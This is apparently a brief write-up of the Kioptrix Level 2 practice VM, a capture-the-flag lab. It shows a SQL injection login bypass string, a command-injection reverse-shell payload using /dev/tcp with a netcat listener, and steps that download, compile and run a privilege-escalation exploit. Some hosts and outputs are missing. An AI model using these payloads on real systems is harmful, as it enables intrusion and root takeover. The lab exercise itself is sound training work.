Kioptrix: Level 2

This is my writeup for the Kioptrix Level 2 VM from It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering


We now have a list of ports. When we access the IP of the VM on port 80, we see a login form which can be bypassed by entering:

username: admin' '1'or'1


We then find a console asking us to enter an IP to ping. It kinda begs for malicious input.


$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Searchsploit returns


Reverse shell

Start netcat on kali:

$ nc -nvlp 42

Try to connect back:

1;0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196




Since we now have a reverse shell we can run the mentioned exploit.

$ curl -k > exploit.c
$ gcc -o exploit exploit.c
$ chmod +x exploit
$ ./exploit


oscp vulnhub writeup spoiler kioptrix